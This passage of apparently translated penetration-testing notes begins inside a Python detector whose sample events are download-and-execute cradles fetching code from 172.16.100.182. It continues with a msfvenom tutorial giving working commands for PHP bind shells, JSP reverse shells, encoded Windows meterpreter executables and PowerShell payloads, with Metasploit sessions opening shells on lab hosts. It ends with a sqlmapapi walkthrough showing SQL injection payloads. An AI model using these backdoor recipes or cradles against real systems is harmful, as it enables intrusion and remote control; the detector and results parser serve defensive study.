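        "IEX $z.downloadstring('http://172.16.100.182:8080/AwOpQNolkZNZz');"},
    {"host": "dell-PC", "pid": 4188, "cmdline":
        r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"host": "dell-PC", "pid": 4201, "cmdline":
        "python -c \"import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],"
        "fromlist=('urlopen',));r=u.urlopen('http://172.16.100.182:8080/7UBHdklf');exec(r.read());\""},
    {"host": "web01", "pid": 9012, "cmdline": "python -c \"import sys; print(sys.version)\""},
    {"host": "web01", "pid": 9044, "cmdline":
        "php -d allow_url_fopen=true -r \"eval(file_get_contents('http://172.16.100.182:8080/ZuvhhHCImHt5wT1'));\""},
    {"host": "web01", "pid": 9050, "cmdline": "php -r \"echo 1;\""},
]


def classify(cmdline):
    """Names of every rule whose indicators all appear in the command line."""
    return [name for name, pats in RULES.items() if all(re.search(p, cmdline) for p in pats)]


def scan_events(events):
    """Return one alert per event that matches a cradle, with the URLs to block."""
    alerts = []
    for ev in events:
        rules = classify(ev["cmdline"])
        if rules:
            alerts.append({"host": ev["host"], "pid": ev["pid"], "rules": rules,
                           "urls": URL_RE.findall(ev["cmdline"])})
    return alerts


if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(alert["host"], alert["pid"], alert["rules"], alert["urls"])
```

Requiring every indicator in a set, rather than any one of them, is what keeps the benign PowerShell script and the ordinary python -c invocation quiet; the URL extraction gives the responder the stager address to block at the proxy and to pivot on in the web logs.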

Metasploit Framework msfvenom

msfvenom command-line options:

Options:

-p, --payload <payload> Payload to use; specify '-' or stdin to use a custom payload
-l, --list [module_type] List all available resources of the given module type. Module types: payloads, encoders, nops, all
-n, --nopsled <length> Prepend a NOP sled of the given length to the payload
-f, --format <format> Output format (use --help-formats for the list of formats msf supports)
-e, --encoder [encoder] Encoder to use
-a, --ar
ch <architecture> Target architecture of the payload
--platform <platform> Target platform of the payload
-s, --space <length> Maximum size of the resulting payload
-b, --bad-chars <list> Characters to avoid, e.g. '\x00\xff'
-i, --iterations <count> Number of times to encode the payload
-c, --add-code <path> An additional win32 shellcode file to include
-x, --template <path> A custom executable file to use as a template
-k, --keep Preserve the template program's behaviour and run the injected payload as a new process
--payload-options List the payload's standard options
-o, --out <path> Save the payload (">" can be used instead)
-v, --var-name <name> A custom variable name to use for certain output formats
--smallest Generate the smallest possible payload
-h, --help Show this help

--help-formats lists the output formats msf supports

root@kali:/usr/share/metasploit-framework/modules/payloads/singles# msfvenom --help-formats
Executable formats
	asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
Transform formats
	bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

The -f format can be abbreviated to a single capital letter:
for example X stands for -f exe

[H]arp
[P]erl
Rub[Y]
[R]aw
[J]s
e[X]e
[D]ll
[V]BA
[W]ar
Pytho[N]

Look at the payloads first: there are currently 437 payloads, grouped roughly by platform (windows/linux/osx/android) and by language (python/php and so on).
root@kali:~# msfvenom -l payloads

List the supported encoders
root@kali:~# msfvenom -l encoders
If you use -b (a set of bad characters to avoid), an encoder is invoked automatically.
Otherwise use -e to select an encoder module, for example:
./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -f raw
-i can be used to encode several times.
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=172.16.100.128 LPORT=2345 -f exe -o abc.exe

Some usage demonstrations follow:
Kali: 172.16.100.182
Test machine: 172.16.100.155

PHP: generating a backdoor with msfvenom


List the PHP-related payloads

msfvenom -l payloads | grep php

bind_php is used for this test

php/bind_php Listen for a connection and spawn a command shell via php

View the options

root@kali:~# msfvenom -p php/bind_php --payload-options

Generate the backdoor

msfvenom -p php/bind_php RHOST=172.16.100.155 R

Remove the leading /*
Visit http://172.16.100.155/1.php, then check the listener

[root@vincenthostname html]# netstat -antlp | grep httpd
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 1494/httpd

msf > use multi/handler
msf exploit(handler) > set payload php/bind_php
payload => php/bind_php
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------



Payload options (php/bind_php):

Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address



Exploit target:

Id Name
-- ----
0 Wildcard Target



msf exploit(handler) > set rhost 172.16.100.155
rhost => 172.16.100.155
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started bind handler
msf exploit(handler) > [*] Command shell session 1 opened (172.16.100.182:43351 -> 172.16.100.155:4444) at 2017-09-14 15:57:11 +0800

Upgrade to Meterpreter

msf exploit(handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.100.182:4433 
[*] Sending stage (826840 bytes) to 172.16.100.155
[*] Meterpreter session 2 opened (172.16.100.182:4433 -> 172.16.100.155:43087) at 2017-09-14 15:58:49 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption
[*] Command stager progress: 100.00% (736/736 bytes)
msf exploit(handler) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell php/php 172.16.100.182:43351 -> 172.16.100.155:4444 (172.16.100.155)
2 meterpreter x86/linux uid=48, gid=48, euid=48, egid=48 @ 172.16.100.155 172.16.100.182:4433 -> 172.16.100.155:43087 (172.16.100.155)

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer : 172.16.100.155
OS : CentOS 6.5 (Linux 2.6.39)
Architecture : x64
Meterpreter : x86/linux

Java: generating a backdoor with msfvenom


List the usable payloads

msfvenom -l payloads | grep java

Here we use

java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.100.182 > /tmp/shell.jsp
Payload size: 1500 bytes

A reverse shell is obtained once the page is visited

msf > use multi/handler
msf exploit(handler) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(handler) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
msf exploit(handler) > [*] Command shell session 1 opened (172.16.100.182:4444 -> 172.16.100.1:5509) at 2017-09-14 16:11:10 +0800
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

E:\tomcat\bin>whoami
whoami
dell-pc\dell

Windows: generating a backdoor with msfvenom


root@kali-vincent:/tmp# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=172.16.100.128 LPORT=2345 -f exe -o abc.exe

Local listener:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.100.128
LHOST => 172.16.100.128
msf exploit(handler) > set LPORT 2345
LPORT => 2345
msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.100.128:2345 
[*] Starting the payload handler...
[*] Sending stage (885806 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.128:2345 -> 172.16.100.1:56101) at 2016-03-20 16:08:55 +0800

meterpreter > sysinfo 
Computer : DELL-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64 (Current Process is WOW64)
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32

Windows: generating a PowerShell backdoor


msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.100.182 LPORT=6666 -f psh-reflection > test.ps1
msf > use multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:6666

Then on Windows run powershell -file "test.ps1"

msf exploit(handler) > 
[*] Sending stage (194623 bytes) to 172.16.100.1
[*] Meterpreter session 6 opened (172.16.100.182:6666 -> 172.16.100.1:62470) at 2017-09-23 17:33:08 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

msf exploit(handler) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > getuid
Server username: dell-PC\dell

References
http://www.freebuf.com/sectool/72135.html
http://www.huo119.com/post/909.shtm

[Sqlmap] Using sqlmapapi

sqlmapapi, as a tool for automated, distributed scanning, offers quite a few conveniences.

sqlmapapi parameters:
[root@CentOS sqlmap-master]# python sqlmapapi.py -h
Usage: sqlmapapi.py [options]

Options:
-h, --help show this help message and exit
-s, --server Act as a REST-JSON API server
-c, --client Act as a REST-JSON API client
-H HOST, --host=HOST Host of the REST-JSON API server
-p PORT, --port=PORT Port of the the REST-JSON API server

sqlmapapi workflow:
[root@CentOS sqlmap-master]# python sqlmapapi.py -s
[15:16:14] [INFO] Running REST-JSON API server at '127.0.0.1:8775'.
[15:16:14] [INFO] Admin ID: cddf73b09c3e45fce0087b28d96d26ab
[15:16:14] [DEBUG] IPC database: /tmp/sqlmapipc-TwbxoE
[15:16:14] [DEBUG] REST-JSON API server connected to IPC database
[root@CentOS sqlmap-master]# curl http://127.0.0.1:8775/task/new
{
  "taskid": "6bccaf0fe2043330",
  "success": true
}
[root@CentOS sqlmap-master]# curl -H "Content-Type: application/json" -X POST -d '{"url": "http://testphp.vulnweb.com/artists.php?artist=1"}' http://127.0.0.1:8775/scan/6bccaf0fe2043330/start
{
  "engineid": 17618,
  "success": true
}
[root@CentOS sqlmap-master]# curl http://127.0.0.1:8775/scan/6bccaf0fe2043330/data
{
  "data": [
    {
      "status": 1,
      "type": 0,
      "value": [
        {
          "dbms": "MySQL",
          "suffix": "",
          "clause": [
            1
          ],
          "ptype": 1,
          "dbms_version": [
            ">= 5.0.12"
          ],
          "prefix": "",
          "place": "GET",
          "os": null,
          "conf": {
            "string": null,
            "notString": null,
            "titles": false,
            "regexp": null,
            "textOnly": false,
            "optimize": false
          },
          "parameter": "artist",
          "data": {
            "1": {
              "comment": "",
              "matchRatio": 0.71399999999999997,
              "title": "AND boolean-based blind - WHERE or HAVING clause",
              "templatePayload": null,
              "vector": "AND [INFERENCE]",
              "where": 1,
              "payload": "artist=1 AND 2672=2672"
            },
            "5": {
              "comment": "",
              "matchRatio": 0.71399999999999997,
              "title": "MySQL >= 5.0.12 AND time-based blind (SELECT)",
              "templatePayload": null,
              "vector": "AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])",
              "where": 1,
              "payload": "artist=1 AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))hKsS)"
            },
            "6": {
              "comment": "-- ",
              "matchRatio": 0.71399999999999997,
              "title": "Generic UNION query (NULL) - 1 to 20 columns",
              "templatePayload": null,
              "vector": [
                0,
                3,
                "-- ",
                "",
                "",
                "NULL",
                2,
                true,
                false
              ],
              "where": 2,
              "payload": "artist=-6479 UNION ALL SELECT CONCAT(0x7171767a71,0x7a6d7378465941786759,0x717a6b7a71),NULL,NULL-- "
            }
          }
        }
      ]
    }
  ],
  "success": true,
  "error": []
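As an added example, not part of the original post or of sqlmap, the following Python code parses the JSON that /scan/<taskid>/data returns (the shape shown above) into a flat list of findings a developer can act on: the injected parameter, where it sits, the back-end DBMS and the technique titles sqlmap confirmed. It also recognises a finished scan from the /scan/<taskid>/status reply, whose "status": "terminated" value is not shown on this page and is taken from sqlmap's API. The embedded response is constructed from the values on this page; injection records are detected by the presence of a "parameter" key rather than by the numeric "type" code, whose meaning the page does not explain.

```python
import json

# Constructed /scan/<taskid>/data response following the shape shown above
SAMPLE_RESPONSE = json.loads(r'''{
  "data": [
    {"status": 1, "type": 0, "value": [
      {"dbms": "MySQL", "dbms_version": [">= 5.0.12"], "os": null,
       "place": "GET", "parameter": "artist", "prefix": "", "suffix": "",
       "data": {
         "1": {"title": "AND boolean-based blind - WHERE or HAVING clause",
               "payload": "artist=1 AND 2672=2672", "where": 1},
         "5": {"title": "MySQL >= 5.0.12 AND time-based blind (SELECT)", "where": 1},
         "6": {"title": "Generic UNION query (NULL) - 1 to 20 columns", "where": 2}
       }}
    ]}
  ],
  "success": true,
  "error": []
}''')


def parse_findings(resp):
    """Flatten sqlmapapi's data list into one record per confirmed injection technique."""
    if not resp.get("success", False):
        raise ValueError("sqlmapapi reported failure: %r" % resp.get("error"))
    findings = []
    for entry in resp.get("data", []):
        value = entry.get("value")
        if not isinstance(value, list):
            continue
        for target in value:
            # only injection records carry a "parameter" (assumed discriminator)
            if not isinstance(target, dict) or "parameter" not in target:
                continue
            techniques = target.get("data", {})
            for key in sorted(techniques, key=int):
                tech = techniques[key]
                findings.append({
                    "parameter": target["parameter"],
                    "place": target.get("place"),
                    "dbms": target.get("dbms"),
                    "dbms_version": " ".join(target.get("dbms_version") or []),
                    "technique": tech.get("title"),
                    "payload": tech.get("payload"),
                })
    return findings


def scan_finished(status_resp):
    """True once /scan/<taskid>/status reports the engine as terminated."""
    return status_resp.get("success", False) and status_resp.get("status") == "terminated"


def report(findings):
    """One line per finding, suitable for a ticket to the application owner."""
    return "\n".join(
        "%s parameter '%s' (%s %s): %s" % (
            f["place"], f["parameter"], f["dbms"], f["dbms_version"], f["technique"])
        for f in findings
    )


if __name__ == "__main__":
    print(report(parse_findings(SAMPLE_RESPONSE)))
```

Polling /scan/<taskid>/status until scan_finished() is true and only then calling /scan/<taskid>/data avoids reading a half-populated result list; the report deliberately leaves the payload out so the ticket carries the location and technique, not a ready-made request.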